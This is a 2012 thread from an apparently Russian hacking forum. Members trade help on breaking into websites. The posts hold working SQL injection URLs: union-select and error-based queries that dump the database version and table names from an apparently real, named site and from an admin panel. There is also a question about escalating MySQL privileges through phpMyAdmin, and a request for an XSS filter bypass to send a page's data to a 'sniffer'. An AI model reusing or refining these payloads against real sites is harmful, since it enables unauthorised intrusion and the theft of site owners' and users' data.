24.05.2012, 15:08
|
|
Новичок
Регистрация: 17.11.2011
Сообщений: 24
С нами:
7624406
Репутация:
2
|
|
вроде нaшел скулю пишет ошибка
Сообщение от None
SQLSTATE[HY000]: General error: 1191 Can't find FULLTEXT index matching the column list
как раскрутить? |
|
|
24.05.2012, 15:15
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
С нами:
8998242
Репутация:
2
|
|
Сообщение от Spoos
вроде нaшел скулю пишет ошибка
как раскрутить?
А как крутил ?
|
|
|
|
24.05.2012, 15:20
|
|
Новичок
Регистрация: 17.11.2011
Сообщений: 24
С нами:
7624406
Репутация:
2
|
|
Сообщение от t3cHn0iD
А как крутил ?
http://admin.site.com/goods/?where=dsffds''
|
|
|
|
24.05.2012, 15:36
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от Spoos
http://admin.site.com/goods/?where=dsffds''
Код:
http://admin.site.com//goods/?where=1)+limit+1,1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,user(),database(),version()),19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+
|
|
|
|
25.05.2012, 01:41
|
|
Новичок
Регистрация: 09.04.2012
Сообщений: 0
С нами:
7417046
Репутация:
0
|
|
Можно получить права админа mysql с помощью phpmyadmin 2.11.11.3
Учетка юзера в базе есть, к file нет привилегий.
|
|
|
|
25.05.2012, 06:17
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
нашел по сути банальную xss в input.
проблема состоит в том, что ничего не фильтруется кроме двойного слеша в ссылке на снифер. // - удаляет. если ///, то оставляет один... дальнейшие манипуляции с слешом не приносят успехов.
знатоки Js, подскажите пожалуйста возможную реализацию, что бы ссылка не фильтровалась. Мне для общего развития, уязвимость все-равно админам сдам. я уже пол ночи сижу и мучаюсь... и табуляцию режет между этими слешами и пробелы.
где то проскакивал способ через eval, но я не осилил.
+ ограничение на 100 символов.
|
|
|
|
25.05.2012, 07:21
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от justonline
нашел по сути банальную xss в input.
проблема состоит в том, что ничего не фильтруется кроме двойного слеша в ссылке на снифер. // - удаляет. если ///, то оставляет один... дальнейшие манипуляции с слешом не приносят успехов.
знатоки Js, подскажите пожалуйста возможную реализацию, что бы ссылка не фильтровалась. Мне для общего развития, уязвимость все-равно админам сдам. я уже пол ночи сижу и мучаюсь... и табуляцию режет между этими слешами и пробелы.
где то проскакивал способ через eval, но я не осилил.
+ ограничение на 100 символов.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Где
Сообщение от None
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
это alert('XSS').
|
|
|
|
25.05.2012, 07:29
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
Сообщение от Ereee
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Где
это alert('XSS'). работать дальше тега input нельзя. и больше 100 символов писать нельзя
на сайте закрыто все, что можно из xss... но одно поле забыли...и то сделали фильтрацию // только для того, что бы не было нагромождений и показывало обычный урл. Они даааже не подозревали, сколько это вызовет у меня негодований
энибоди кен хелп ми?
|
|
|
|
25.05.2012, 21:17
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
такой вопросец
нормально вывело версию
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.chronopuncture.info/vr/index.php?md=details&id=108093%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR]
пытаюсь к примеру вывести таблицы
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.chronopuncture.info/vr/index.php?md=details&id=108093'+or+1+group+by+concat((select+concat_ws(0x3a,table_schema,table_name,table_rows)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+0,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+[/COLOR][/COLOR]
уже переадресация, чёзаа байда, как боротся? |
|
|
|
25.05.2012, 21:51
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от qaz
такой вопросец
нормально вывело версию
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.chronopuncture.info/vr/index.php?md=details&id=108093%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR]
пытаюсь к примеру вывести таблицы
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.chronopuncture.info/vr/index.php?md=details&id=108093'+or+1+group+by+concat((select+concat_ws(0x3a,table_schema,table_name,table_rows)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+0,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+[/COLOR][/COLOR]
уже переадресация, чёзаа байда, как боротся? фильтруется from
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
